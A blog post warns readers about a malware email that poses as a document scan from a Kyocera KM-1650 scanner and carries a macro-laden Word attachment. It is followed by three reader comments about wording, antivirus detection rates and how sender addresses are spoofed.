Scanner sent you a document? Beware of malware attack

KM-1650

Here is an email I received this morning, claiming to come from an email address at my domain name: .

Scanner malware

The email is fairly perfunctory with its subject line of "Scan from KM1650", and its body text of "Please find attached your recent scan".

Attached to the file is a Microsoft Word document called =SCAN7318_000.DOC.

Now, this might be slightly plausible if I had a scanner attached to my network which I had configured to email me scans. But I don't.

One assumes the criminals behind the attack are banking that my place of work uses a Kyocera KM-1650 multi-function printer, or that I'm simply so excited about receiving an email from a scanner that I would open the attachment without even thinking.

Of course, if you receive the malware in your email chances are that it won't claim to be from . Instead, it will probably pretend to be scanner@example.com instead, where example.com matches the domain and tld of your email address.

There has been a long history of cybercriminals spamming out malware pretending to be from printers and scanners, and there have been a number of recent campaigns suggesting that it's a disguise that continues to dupe the unwary.

WordA quick check on VirusTotal reveals that relatively few anti-virus products are identifying the malware presently, but I can tell you that the Word document contains auto-executing macros that attempt to download further malicious code from the net designed to infect your Windows PC.

Always be suspicious of unsolicited emails, and be wary of opening files which may be attached to them. Acting recklessly with the contents of your inbox could mean your computer ends up compromised and your bank account plundered.

Repeat after me:

"Thou shalt not open dodgy-looking attachments in unsolicited emails"

Tags: , , , ,

Subscribe to the free GCHQ newsletter


, , , ,

Leave a reply

3 Comments on "Scanner sent you a document? Beware of malware attack"

Notify of
avatar

Sort by:   newest | oldest | most voted
coyote
Member
Not a lurker
coyote
February 11, 2016 11:07 pm

Just a thought that might make this a bit easier to understand (for many people):

'matches the domain and tld of your email address.'

When I first read that the font and my tired head made me read the L as 'I' but then I realised that it is actually 'L' (I suppose that's another reason to write the abbreviation in upper case). I know most won't know what it is and most won't care but you could just explain it away by saying (just to give an example):

'where example.com is your email domain' (because after all people think of example.com as a domain even though it's not that simple). Or another way:

'where example.com is what's after the @ in your email address'

Because let's be honest. Most people owning domains won't understand what top level domain means and even if they do they probably don't understand the (subtle) difference between a zone and a domain (or much of anything in DNS other than it maps from name to IP and IP to name). Besides administrators very few would even care about this as long as it works.

drsolly
Visitor
drsolly
February 11, 2016 11:56 pm

9 hours later – 5 out of 54 products flag it.

Antivirus software usually does not protect you against emailed trojans.

Simon
Visitor
Simon
February 12, 2016 3:34 pm

As someone with only a basic knowledge of TLDs etc and the full workings of email my question is how exactly does a spammer make the email appear to come from your email address when it has not been compromised? How do you send an email that looks like it comes from scanner@mydomain.com when you have not first hacked and taken control of mydomain.com? Are they just altering the 'reply to' address and my basic email program isn't able to/set up to display the full email header which would show the true origin email address?

wpDiscuz